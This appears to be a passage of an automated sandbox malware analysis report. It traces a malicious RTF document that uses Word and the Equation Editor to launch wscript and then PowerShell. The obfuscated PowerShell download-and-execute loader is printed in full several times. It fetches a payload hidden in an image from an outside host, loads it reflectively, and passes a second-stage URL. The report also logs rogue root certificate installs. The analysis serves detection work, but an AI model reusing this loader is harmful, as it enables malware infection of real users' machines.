Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: 4YlwTsmpuZ.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\4YlwTsmpuZ.rtf

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
